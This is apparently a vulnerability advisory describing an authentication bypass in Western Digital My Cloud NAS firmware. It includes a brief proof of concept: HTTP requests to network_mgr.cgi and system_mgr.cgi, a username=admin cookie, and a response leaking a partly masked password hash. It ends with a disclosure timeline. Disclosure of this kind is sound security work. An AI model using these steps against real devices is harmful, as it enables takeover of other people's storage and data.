Authentication bypass vulnerability in Western Digital My Cloud allows escalation to admin privileges
It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the My Cloud device.
This vulnerability was successfully verified on a Western Digital My Cloud model WDBCTL0020HWT running firmware version 2.21.126. This issue is not limited to the model that was used to find this vulnerability since most of the products in the My Cloud series share the same (vulnerable) code.
Fixed in 2.30.165 (04/12/2017)
Western Digital My Cloud is a low-cost entry-level network-attached storage device. It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability that allows an unauthenticated user to create an admin session that is tied to his/her ip address. By exploiting this issue an unauthenticated attacker can run commands that would normally require admin privileges and gain complete control of the My Cloud device.
The issues was discovered while reverse engineering the cgi binaries to look for security issues.
The network_mgr.cgi cgi module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when the command is called with the parameter flag=1. Subsequent invocation of commands that would normally require admin privileges are not authorized when an attacker sets the username=admin cookie.
Proof of concept
Establishing an admin session that is tied to the ip of the requester.
POST /cgi-bin/network_mgr.cgi HTTP/1.1
Call an endpoint (e.g., cgi_get_ssh_pw_status) that requires admin privelges and authenticate as admin by adding the cookie username=admin
POST /cgi-bin/system_mgr.cgi HTTP/1.1
Response from the Western Digital MyCloud:
HTTP/1.1 200 OK
Date: Sat, 01 Jan 2000 00:18:27 GMT
<?xml version="1.0" encoding="UTF-8"?><ssh><info>sshd:$1$$CoERg7ynjYLsj2j4****.:14746:0:99999:7:::
- 10 April 2017: Discovered vulnerability.
- 12 April 2017: Reported to Western Digital customer support.
- 12 April 2017: Response from Western Digital that the vulnerability has been forwarded to their vulnerability assessment team.
- 12 April 2017: Fix released in firmware 2.30.165. However, no response from Western Digital.